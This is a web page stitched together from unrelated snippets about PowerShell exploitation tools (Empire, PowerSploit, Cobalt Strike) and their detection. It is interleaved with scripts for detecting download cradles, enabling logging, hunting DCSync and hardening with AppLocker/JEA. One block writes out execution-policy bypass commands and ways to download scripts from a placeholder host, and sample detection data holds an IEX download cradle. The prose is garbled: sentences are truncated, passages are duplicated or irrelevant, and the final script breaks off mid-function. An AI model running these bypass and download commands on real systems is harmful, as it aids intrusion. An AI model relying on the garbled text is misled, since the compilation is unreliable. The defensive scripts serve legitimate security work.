
PowerShell exploitation

Detecting PowerShell for exploitation. To be able to detect most PowerShell commands and actions, you need to have some logging enabled first. Use Sysmon and/or enable PowerShell logging under the policy key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ (the same values that Group Policy writes).

This is our second post in the article series 'PowerShell Empire'. In this article, we will cover the exploits that lead to Windows exploitation with Empire. To read our first post of the Empire series, which gives a basic guide to navigating your way through Empire, click here. Table of Content: Exploiting through HT

Empire is a pure PowerShell post-exploitation agent built on cryptographically secure communications and a flexible architecture.

An attacker uses PowerShell as a post-exploitation tool: the malicious PowerShell code runs because the attacker already has the ability to run code on the system, either because a user was tricked into opening or executing a file, or through exploitation of a vulnerability.

The constraints posed by Constrained Language Mode (CLM) will block many exploitation attempts, as key functionality in PowerShell is blocked. Bypassing CLM is largely the same as bypassing AppLocker, since it is AppLocker (or WDAC) enforcement that puts PowerShell into CLM in the first place.

The top category of threats detected across endpoints by Cisco Secure Endpoint was dual-use tools leveraged for exploitation and post-exploitation tasks, such as PowerShell Empire and Cobalt Strike.

The company says no mitigation measures are available to block exploitation of the security flaw tracked as CVE-2021-26701. Customers are urged to install the updated PowerShell 7.0.6 and 7.1.3.

PowerShellGet is a PowerShell module that contains commands for discovering, installing, publishing, and updating PowerShell modules (and other artifacts) to or from a NuGet repository. PowerShellGet ships with PowerShell version 5.0 and higher. It is available as a separate download for PowerShell version 3.0 and higher.

After that, it can do post-exploitation activities like taking screenshots, port scanning and browser pivoting. Additionally, Cobalt Strike provides lateral movement using SMB and TCP beacons once the attacker gets initial access. Conclusion: this is an overview of Cobalt Strike's scripted web delivery PowerShell attack framework.

PowerShell offers a fileless attack process. You don't need to drop malware to run the attack on the target's machine: attackers just need access to the box and can spin up PowerShell to call a remote file which would use malware or commands to perform actions on the target's machine.

PowerSploit: PowerShell Post-Exploitation Framework. These modules allow you to run scripts on the target machine, prepare scripts for execution on a target machine, add persistence capabilities to a PowerShell script, extract data from the target machine and aid the user in performing reconnaissance during the penetration test.

The list includes various post-exploitation one-liners in pure PowerShell without requiring any offensive (i.e. potentially flagged as malicious) third-party modules, but also a bunch of handy administrative commands. Let's get to it.

Empire is a post-exploitation framework. It is a pure PowerShell agent on Windows, with a Python agent for Linux and macOS, built on cryptographically secure communications and a flexible architecture. Empire has the means to execute PowerShell agents without the requirement of powershell.exe.

One detection opportunity is to alert on a process that appears to be schtasks.exe executing with a corresponding command line that includes create and powershell. The original post illustrates this with Sapphire Pigeon activity, but this analytic is useful beyond detecting just that cluster. Additional post-exploitation detection opportunities:

PowerShell. Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. [1] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.

PowerSploit modules: PowerUp. PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities.

PowerShell is a full Windows administration framework, and it's built into the OS. It can't be completely blocked. When we talk about post-exploitation in Windows environments, consideration of PowerShell is not a nice-to-have; it's a necessity.
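As an added illustration (not code from Red Canary, MITRE or any other source quoted above), here is the schtasks analytic together with a script-block download-cradle check, run over a few constructed events. The event objects are simplified stand-ins for Sysmon Event ID 1 / Security 4688 (process creation) and PowerShell Operational 4104 (script block text); the command lines, task name and URL are made up for the example.

```powershell
# Constructed sample events (not real telemetry). Id 1 mimics Sysmon process
# creation; Id 4104 mimics a PowerShell script-block log entry.
$sampleEvents = @(
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\schtasks.exe'
        CommandLine = 'schtasks.exe /create /tn Updater /tr "powershell -nop -w hidden -enc SQBFAFgA" /sc minute' }
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\schtasks.exe'
        CommandLine = 'schtasks.exe /query /tn Updater' }
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe /c powershell -Command Get-Date' }
    [pscustomobject]@{ Id = 4104
        ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/a.ps1")' }
    [pscustomobject]@{ Id = 4104
        ScriptBlockText = 'Get-ChildItem C:\Users | Select-Object Name' }
)

function Find-SuspiciousPowerShell {
    param([Parameter(Mandatory)][object[]]$Events)

    # Analytic 1 (the one quoted above): schtasks.exe creating a task whose
    # action launches PowerShell. /query or /delete on the same task is not enough.
    $taskHits = $Events | Where-Object {
        $_.Id -eq 1 -and
        $_.Image -match '\\schtasks\.exe$' -and
        $_.CommandLine -match '(?i)\s/create\b' -and
        $_.CommandLine -match '(?i)powershell'
    } | ForEach-Object {
        [pscustomobject]@{ Rule = 'schtasks-create-powershell'; Evidence = $_.CommandLine }
    }

    # Analytic 2: script-block text containing a download cradle, an encoded
    # command, or Invoke-Expression. Script block logging records the text
    # after decoding, which is why it catches obfuscated one-liners.
    $cradle = '(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|' +
              '-enc(odedcommand)?\b|\biex\b|Invoke-Expression)'
    $blockHits = $Events | Where-Object {
        $_.Id -eq 4104 -and $_.ScriptBlockText -match $cradle
    } | ForEach-Object {
        [pscustomobject]@{ Rule = 'scriptblock-download-cradle'; Evidence = $_.ScriptBlockText }
    }

    @($taskHits) + @($blockHits)
}

# Against the constructed events this yields exactly two hits, one per analytic;
# the /query line and the plain Get-ChildItem block are not reported.
Find-SuspiciousPowerShell -Events $sampleEvents | Format-Table -AutoSize

# Same logic against live data: map real 4104 events to the shape above.
# Properties[2] of a 4104 event is its ScriptBlockText field.
function Get-LiveScriptBlocks {
    param([int]$MaxEvents = 200)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Id = 4104; ScriptBlockText = $_.Properties[2].Value } }
}
# Find-SuspiciousPowerShell -Events (Get-LiveScriptBlocks)
```

The 4104 mapping only returns anything once script block logging is enabled, which is the point the first paragraph on this page makes: without the policy values set, the second analytic has nothing to read.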

Detecting PowerShell for exploitation - mpauli

Even extremely basic usage of PowerShell, such as simply replacing remote command execution tools like PsExec with PowerShell's Invoke-Command or Enter-PSSession, lets attackers achieve their objectives and evade detection. These post-exploitation activities largely rely on scripting engines like PowerShell and WMI because scripts provide attackers flexibility and enable them to blend into the normal hum of enterprise endpoint activity.

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. Basically, it is a PowerShell post-exploitation framework that helps you with various tasks like DLL injection, invoking shellcode and setting up script persistence. It also includes reflective PE injection and can reflectively load Mimikatz into memory.

PowerShell has become a handy language to use for pentesting. These are only a few examples of how PowerShell can be leveraged on Kali Linux; there are many more ways that you can use PowerShell on Kali Linux. From a pentester's standpoint, we have used PowerShell to expand our post-exploitation tactics.

Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Multiple Ways to Exploit a Windows PC using PowerShell Empire

  1. Welcome back my fellow hackers! Today we're going to begin covering a post-exploitation framework named Empire. Empire implements Windows PowerShell in order to manipulate the infected host. Empire also encrypts the traffic between the C&C server and the host, providing secure C2 communications.
  2. Empire is a post-exploitation framework whose agents support various operating systems. The Windows agent is implemented purely in PowerShell (without powershell.exe!), and the Linux/macOS agent is written in Python 3. It is feature rich, with various options to bypass protections (and allows for easy modification for custom evasion).
  3. Empire is a post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptographically secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection.
  4. PowerShell reference. You can use the Windows Security app to configure Exploit protection, or you can use PowerShell cmdlets. The configuration settings that were most recently modified will always be applied, regardless of whether you use PowerShell or Windows Security.
  5. PowerShell Runspace Post Exploitation Toolkit. PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team.

According to the firm, there are no mitigation steps available to prevent the exploitation of the security issue identified as CVE-2021-26701. Customers are encouraged to update to PowerShell 7.0.6 and 7.1.3 as soon as possible in order to safeguard their systems from potential threats.

Post exploitation techniques for file transfers on Windows operating systems without the use of Metasploit or other advanced tools. PowerShell, installed by default on most modern versions of Windows, can be leveraged to download files over HTTP in several ways.

By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn't have to be. In this blog I'll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I'm sure there are man

For those that do not know, PowerShell Empire is a post exploitation framework written in PowerShell. The project has recently retired: due to the heightened uptake in PowerShell visibility over the last few years, the project has stated that it has reached its goal and has ended support.
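The two posts above describe the download and execution-policy techniques without showing them. The following is an added example, not taken from either blog, of four of the execution-policy bypasses that need no administrator rights and three built-in HTTP download methods; the script name, URL and destination are placeholders. One caveat the execution-policy post glosses over: the Restricted default applies to Windows client editions, while Windows Server 2012 R2 and later default to RemoteSigned.

```powershell
# Added example. The execution policy is a safety rail against accidentally
# running scripts, not a security boundary: none of the following needs admin
# rights or changes the machine-wide setting. '.\script.ps1' is a placeholder.

# 1. Per-process override on the command line.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\script.ps1

# 2. Process-scoped policy change; lasts only for the current session.
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force

# 3. Read the file yourself and hand the text to the interpreter; the policy
#    governs script *files*, and no file is "run" here.
Get-Content .\script.ps1 -Raw | Invoke-Expression

# 4. Feed the script over standard input to a child powershell.exe.
Get-Content .\script.ps1 | powershell.exe -NoProfile -Command -

# Three built-in ways to fetch a file over HTTP. 198.51.100.10 is a
# documentation-range placeholder, not a real host.
$url  = 'http://198.51.100.10/tool.ps1'
$dest = Join-Path $env:TEMP 'tool.ps1'

(New-Object System.Net.WebClient).DownloadFile($url, $dest)      # .NET WebClient
Invoke-WebRequest -Uri $url -OutFile $dest -UseBasicParsing       # cmdlet, PS 3.0+
Start-BitsTransfer -Source $url -Destination $dest                # BITS service

# What the defender sees: with script block logging on, each line above lands
# in a 4104 event as plain text, and "-ExecutionPolicy Bypass" appears in the
# child process command line (Security 4688 / Sysmon 1). "Net.WebClient",
# "DownloadFile" and "Invoke-Expression" are exactly the strings detection
# content keys on, so treat the policy as advisory and rely on logging plus
# application control (AppLocker/WDAC) for enforcement.
```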

PowerShell Empire: Building an Empire with PowerShell

When it comes to exploitation, arbitrary file creation is a vital capability for an attacker to take it to the next stage. By planting a webshell on the remote file system, the attacker can achieve RCE on the target system. This of course assumes that there is a web server running on the target system.

Triaging PowerShell Exploitation with Rekall. David recently published his article Spotting the Adversary, so I figured I'd continue the trend and focus on Blue Team tactics in this post. I've spent a fair bit of time in EnCase. They have a great product and a number of solutions to fit most of your needs, but at times it can feel bulky and a.

How to hack with PowerShell is a common question. PowerShell is powerful and therefore dangerous in the world of security. On top of that it's everywhere, meaning it's already installed on Windows machines by default. Imagine now tools that allow the ethical hacker to run PowerShell in memory without being detected.

PowerShell attacks CAN be detected, and everyone should be moving to configure their systems to record what is needed to capture PowerShell attacks and all the Fu that goes along with it, because by default Windows does NOT enable what you will need to detect PowerShell exploitation.

Post Exploitation with Empire 2.3.0. Empire is a post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptographically secure communications and a flexible architecture.

This blog will demonstrate how to download Empire, a PowerShell post-exploitation tool, in Kali Linux, create a script, make a connection back to your machine from the victim machine without Windows Defender blocking it, elevate privileges, and extract password hashes using Mimikatz.
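Both the first snippet on this page (which names the policy registry key) and the post above say that the logging has to be turned on, but neither shows how. The following is an added example, not from either source, that writes the same registry values the Group Policy templates set for module logging, script block logging and transcription, then verifies that 4104 events appear. The transcript directory is an assumption (in practice use a write-only share the host cannot clean up), and PowerShell 7 reads its own key, HKLM\SOFTWARE\Policies\Microsoft\PowerShellCore, with the same value names. Run it elevated.

```powershell
# Added example: enable the PowerShell logging that is off by default.
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Module logging (event 4103): pipeline execution details for every module.
New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String

# Script block logging (event 4104): the de-obfuscated text of every script block.
New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

# Transcription: a full console transcript per session. OutputDirectory is an
# assumption for this example; point it at a write-only network share in production.
New-Item -Path "$base\Transcription" -Force | Out-Null
Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting   -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts' -Type String

# Verify: start a fresh process (policy is read at startup), run a marker
# command, and look for it in the newest 4104 events. Properties[2] of a 4104
# event holds the script block text.
function Test-ScriptBlockLogging {
    $marker = 'logcheck-' + [guid]::NewGuid().ToString('N')
    powershell.exe -NoProfile -Command "Write-Output '$marker'" | Out-Null
    $hit = Get-WinEvent -FilterHashtable @{
               LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
           } -MaxEvents 50 -ErrorAction SilentlyContinue |
           Where-Object { $_.Properties[2].Value -like "*$marker*" } |
           Select-Object -First 1
    [pscustomobject]@{
        ScriptBlockLoggingWorks = [bool]$hit
        Transcripts             = (Get-ChildItem 'C:\PSTranscripts' -Recurse -ErrorAction SilentlyContinue).Count
    }
}
Test-ScriptBlockLogging
```

Sysmon (mentioned in the same snippet) complements rather than replaces this: it records the powershell.exe process creation and its command line, but only the 4104 channel shows what an encoded or downloaded script actually did.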

Detecting Offensive PowerShell Attack Tools - Active

PowerShell Empire has two modules which can retrieve domain hashes via the DCSync attack. Both modules need to be executed from the perspective of a domain administrator, and they use the Microsoft replication services. There is also a post exploitation module which can be linked into an existing Meterpreter session in order to retrieve.

Per Microsoft's blog, they have identified additional post-exploitation activities, including: credential theft via dumping of LSASS process memory; compression of data for exfiltration via 7-Zip; use of Exchange PowerShell snap-ins to export mailbox data; use of additional offensive security tools Covenant, Nishang, and PowerCat for remote.

The increased use of PowerShell exploitation supports a growing industry trend of malware authors experimenting with ways of evading detection by exploiting operating system (OS) tools, the report.

PowerSploit - A PowerShell Post-Exploitation Framework. PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: Execute code on a target machine
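An added detection example for the first paragraph, not from the Empire documentation or from Microsoft's post: because DCSync works by asking a domain controller for replication, it surfaces on the DC as Security event 4662 carrying the replication extended rights. The two GUIDs below are the schema GUIDs of the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights; legitimate replication comes from DC computer accounts, so anything else is worth a look. The DC name, lookback window and list of known DC accounts are assumptions, and the Directory Service Access audit subcategory must be enabled on the DC for 4662 to be written at all.

```powershell
# Added example: hunt for DCSync in Security 4662 events on a domain controller.
$replGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
)

# Pure matching logic, separated so it can be checked without a DC.
function Test-ReplicationRights {
    param([string]$Properties)
    foreach ($g in $replGuids) { if ($Properties -match $g) { return $true } }
    return $false
}

function Find-DCSync {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # assumption: run on, or point at, a DC
        [datetime]$Since = (Get-Date).AddDays(-1),
        [string[]]$KnownDCs = @()                    # sAMAccountNames such as 'DC01$'
    )
    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = $Since }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
      ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time       = $_.TimeCreated
            Subject    = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            ObjectType = $d.ObjectType
            Properties = $d.Properties
        }
      } |
      Where-Object {
        (Test-ReplicationRights $_.Properties) -and
        -not ($_.Subject -match '\$$') -and                         # not a machine account
        -not ($KnownDCs -contains (($_.Subject -split '\\')[-1]))
      }
}

# Offline check of the matching logic against a constructed Properties field
# (the shape of the 4662 'Properties' data, not a real event): returns True.
$constructed = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}'
Test-ReplicationRights $constructed

# Live use on a DC, excluding the known DC accounts:
# Find-DCSync -KnownDCs 'DC01$', 'DC02$' | Format-Table -AutoSize
```

Azure AD Connect and some backup products legitimately hold these rights under a user account; add those accounts to the exclusion list rather than widening the filter, so that a domain-admin user performing DCSync from a workstation, which is what the Empire modules do, still shows up.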

Windows & Active Directory Exploitation Cheat Sheet and

Origins. Empire is a pure PowerShell post-exploitation agent built on cryptographically secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Combined with the extensive functionality PowerShell provides, it is clear PowerShell is an extremely powerful post-exploitation tool. Using PowerShell to administer your environment: an assessment of the security implications of allowing PowerShell in an organisation may lead to the immediate desire to block access to PowerShell.

If you have the value of __VIEWSTATEGENERATOR you can try to use the --generator parameter with that value and omit the parameters --path and --apppath. If the ViewState deserialization vulnerability is successfully exploited, an attacker-controlled server will receive an out-of-band request containing the username. PoC of Successful Exploitation.

PowerShell Is Source of Over 1/3 of Critical Security Threat

  1. Empire is a post-exploitation framework that combines the power of PowerShell and Python to create a framework which can be used to deploy post-exploitation modules such as keyloggers or Mimikatz on the target systems. This framework uses cryptography to secure communications while also offering a flexible architecture.
  2. The Windows PowerShell team almost cut this feature because it turns out to be quite hard to do in a sensible way. Here is the syntax for Remove-Module: When a module is removed, all the modules it loaded as nested modules are also removed from the global module table. This happens even if the module was explicitly loaded at the global level.
  3. The Microsoft team released some PowerShell scripts to help you search for exploitation artifacts such as manually created .aspx files. Researcher Kevin Beaumont also released a quick-and-dirty nmap script to find potentially vulnerable servers in your environment.
  4. Nishang is an open source framework with several powerful PowerShell scripts that you can use during the post exploitation phase of your penetration test. It has many scripts categorized into various categories such as information gathering, scanning, privilege elevation etc.
  5. PowerShell can be found by right clicking on the start button & it should show in the list; from there you can right click on it & choose properties to find where it is stored on your system. Or click on the search icon in the taskbar & enter powershell, which will also find the program. Virginia - Time Lady.

Microsoft warns of critical PowerShell 7 code execution

Empire is a post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptographically secure communications and a flexible architecture.

PoshC2: PoshC2 is a proxy-aware C2 framework that utilizes PowerShell and/or its equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. PowerShell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce.

In this video, I talked about how to create an executable HTML page that runs remote code execution on the target.

But, for us as pentesters, PowerShell represents a powerful shell and scripting language which is present on our pentest targets (in most cases integrated by default from Windows 7 onwards) and provides us with an especially powerful post-exploitation tool and language, which gives us a great deal of power and a very big attack surface.

Slashdot reader storagedude writes: That's right, Microsoft's CLI management tool was the source of more than a third of critical security threats detected by Cisco in the second half of 2020, according to eSecurity Planet. Dual-use tool exploitation was the top threat category noted by Cisco, followed by ransomware, fileless malware, and credential dumping, with PowerShell a primary vector in.

Empire is a pure PowerShell post-exploitation agent built on cryptographically secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

WMI pwnage (LOG-MD.com slides):
• WMI attacks often use PowerShell once on the system; many red teamers avoid this since it is well known, but it is still commonly used, and good logging can and will catch red team PowerShell.
• DCOM and WinRM are also used a lot in these attacks.
• Detecting WMI exploitation.

The output of this PowerShell script will resemble the following. Enabled protections appear in the output as True.

PS C:\> Get-SpeculationControlSettings
Speculation control settings for CVE-2017-5715 [branch target injection]
Hardware support for branch target injection mitigation is present: False

PowerShell is a new-generation command line application developed as an alternative to the Windows command line cmd.exe and Windows Script Host. The target here will be to collect information on the target Active Directory structure via PowerShell. The purpose of this article is to gather information using Windows features without using tools.

One-liners and the pipeline - PowerShell Microsoft Doc

As this is a post-exploitation data retrieval tool, operators of Exchange servers can prevent threat actors from engaging in this type of data exfiltration by diligently installing security patches and updates for their Windows servers, including updates to Exchange, as soon as they are made available.

PowerShellArmoury - A PowerShell Armoury For Security Guys And Girls.

Cobalt Strike 2021 - Analysis of Malicious PowerShell

  1. PowerShell: Get-ChildItem C:\Users; password policy: net accounts; get the content of the clipboard: powershell -command Get-Clipboard. Running processes: list running processes and services: tasklist /SVC; filter SYSTEM processes: tasklist /v /fi "username eq system"
  2. Learn how to use the Homebrew package manager to install post-exploit security tools on macOS to further assess compromised system vulnerabilities found in your Apple equipment.
  3. My Favorite PowerShell Post-Exploitation Tools. PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I'd like to take you through a few of my favorite collections of PowerShell scripts.
  4. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. To install, run the ./setup/install.sh script.

Detecting the Exploitation of Pentesting Tools: Gaining

  1. Additionally, malicious post-exploitation use of PowerShell on a server system is primarily associated with an active adversary, rather than the static approach used by commodity malware on client systems. Without Application Control (as described by point #4 above), active adversaries simply use other scripting languages or custom tooling.
  2. Another PowerShell project that leverages unmanaged PowerShell is p0wnedShell, a PowerShell Runspace Post Exploitation Toolkit. It runs PowerShell commands and functions within a PowerShell runspace environment (.NET) and includes many PowerShell attack tools, including those from PowerSploit, Nishang, PowerCat, Inveigh, etc., all contained.
  3. Shells and Privilege Escalation. Once you have initial access on a machine, learn how to escalate your account privileges to root.
  4. In the context of exploitation, PowerShell obfuscation is heavily utilized in order to bypass and circumvent detection methods. It increases the difficulty for incident responders to quickly identify the purpose of the specific command. CertUtil is a Windows program used to download and update certificates. In the past, adversaries have.

Prevent exploitation using AppLocker and other Windows OS hardening techniques in a scalable way with PowerShell. Configure PowerShell remoting to use Just Enough Administration (JEA) policies to create a Windows version of Linux sudo and setuid root.

Else you can use the below PowerShell script to run commands as that user.

Windows Kernel Exploitation. If the OS is updated regularly then these exploits will not be of much help. You can use Watson to check for vulnerabilities due to missing patches. Watson is already integrated with winPEAS.
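As a worked version of the first paragraph, here is an added example (not the course's own material) of the three pieces fitted together in PowerShell: an AppLocker script rule set that allows only scripts under %WINDIR% and %PROGRAMFILES%, a JEA endpoint that lets a helpdesk group restart one service as a privileged virtual account (the sudo/setuid part), and a check of the language mode that AppLocker enforcement leaves an untrusted script in, which is also the CLM the first snippet on this page talks about. Paths, the endpoint name and the group CONTOSO\ServiceDeskOps are assumptions; run it elevated on a test host, and note that AppLocker rules only enforce once the Application Identity service is running.

```powershell
# --- 1. AppLocker script rules (EnforcementMode="Enabled" = enforce). Scripts
#        outside these paths fail to run, and on PowerShell 5+ an interactive
#        host or non-allowed script is dropped into Constrained Language Mode.
$applockerXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Script" EnforcementMode="Enabled">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Scripts in Windows" Description=""
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Scripts in Program Files" Description=""
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@
$policyPath = Join-Path $env:TEMP 'script-allowlist.xml'
Set-Content -Path $policyPath -Value $applockerXml -Encoding UTF8
sc.exe config appidsvc start= auto | Out-Null   # AppIDSvc is protected; Set-Service cannot change it
Start-Service AppIDSvc
Set-AppLockerPolicy -XmlPolicy $policyPath -Merge   # -Merge keeps rules already in place

# --- 2. JEA: a role capability exposing only Get-Service and
#        Restart-Service -Name Spooler, registered as a remoting endpoint.
$modPath = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\JeaRoles'
New-Item -Path (Join-Path $modPath 'RoleCapabilities') -ItemType Directory -Force | Out-Null
New-ModuleManifest -Path (Join-Path $modPath 'JeaRoles.psd1')   # makes the folder a module JEA can find
$visible = @(
    'Get-Service',
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } }
)
New-PSRoleCapabilityFile -Path (Join-Path $modPath 'RoleCapabilities\SpoolerOps.psrc') -VisibleCmdlets $visible

New-Item -Path 'C:\JEATranscripts' -ItemType Directory -Force | Out-Null   # assumed location
$pssc = Join-Path $env:TEMP 'SpoolerOps.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'CONTOSO\ServiceDeskOps' = @{ RoleCapabilities = 'SpoolerOps' } }
Register-PSSessionConfiguration -Name SpoolerOps -Path $pssc -Force | Out-Null
# A member of CONTOSO\ServiceDeskOps then runs, from their own workstation:
#   Invoke-Command -ComputerName <thishost> -ConfigurationName SpoolerOps -ScriptBlock { Restart-Service Spooler }
# Inside that session only the two cmdlets exist, they execute as a temporary
# local-administrator virtual account, and everything is transcribed.

# --- 3. What CLM looks like from the inside: New-Object on a non-core .NET
#        type is refused, which is why download cradles die under AppLocker.
function Test-LanguageMode {
    $result = [pscustomobject]@{
        LanguageMode     = $ExecutionContext.SessionState.LanguageMode
        WebClientAllowed = $true
    }
    try   { $null = New-Object System.Net.WebClient }
    catch { $result.WebClientAllowed = $false }
    $result
}
Test-LanguageMode   # FullLanguage / True from an allowed path, ConstrainedLanguage / False otherwise
```

The JEA endpoint is the "sudo" the course description promises: the user never holds admin credentials, the allowed surface is a whitelist of cmdlets and parameter values rather than a blacklist, and the transcript gives the blue team the same visibility the logging section above asks for.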

PowerShell Exploitation (MalwareArchaeology.co slides):
• Malware loves to use PowerShell to download and launch payloads, and it tries to hide it too.
• Red teamers love PowerShell, and they love to hide too; it is already built into the OS.
• But they DO make noise and CAN be detected, if you know how.

In recent weeks, Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in a ubiquitous global attack. ProxyLogon is the name given to CVE-2021-26855, a vulnerability in Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate users.

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: Execute code on a target machine. Injects a DLL into the process ID of your choosing.

PowerSploit: A Post-Exploitation Framework in PowerShell! PowerSploit is an open-source, offensive Microsoft PowerShell toolkit that has been coded to help penetration testers in almost all phases of an assignment. It can help you perform reconnaissance and also help you to elevate your privileges and maintain access.

Successful exploitation of the HiveNightmare flaw allows a local adversary to run arbitrary code with SYSTEM rights. As a result, the attacker can launch malicious software on the targeted instance, access and manipulate sensitive data, or even create new admin accounts. However, there is a limitation to leveraging CVE-2021-36934.

p0wnedShell is an offensive PowerShell Runspace Post Exploitation host application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included, making the process of post exploitation easier. What the author tried was to build an all-in-one.
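The limitation the paragraph stops short of stating is that CVE-2021-36934 is only exploitable when a Volume Shadow Copy exists from which the over-permissive hive files can be read. The following is an added check, not from the article quoted, that tests both conditions from an unprivileged session and applies the workaround Microsoft published, which is to restore ACL inheritance on the config directory and delete the existing shadow copies; the number of shadow-copy devices probed is an assumption.

```powershell
# Added example: check and fix the two preconditions of HiveNightmare.
function Test-HiveNightmare {
    param([int]$MaxShadowIndex = 10)   # how many HarddiskVolumeShadowCopyN devices to probe (assumption)

    # Condition 1: BUILTIN\Users can read the live hive files. A healthy host
    # denies even the ACL read, which Get-Acl reports as an error.
    $hives = 'SAM', 'SECURITY', 'SYSTEM' | ForEach-Object { "$env:windir\System32\config\$_" }
    $exposed = foreach ($h in $hives) {
        $acl = Get-Acl -Path $h -ErrorAction SilentlyContinue
        if ($acl -and ($acl.Access | Where-Object {
                $_.IdentityReference -eq 'BUILTIN\Users' -and
                $_.AccessControlType -eq 'Allow' -and
                $_.FileSystemRights.ToString() -match 'Read|FullControl' })) { $h }
    }

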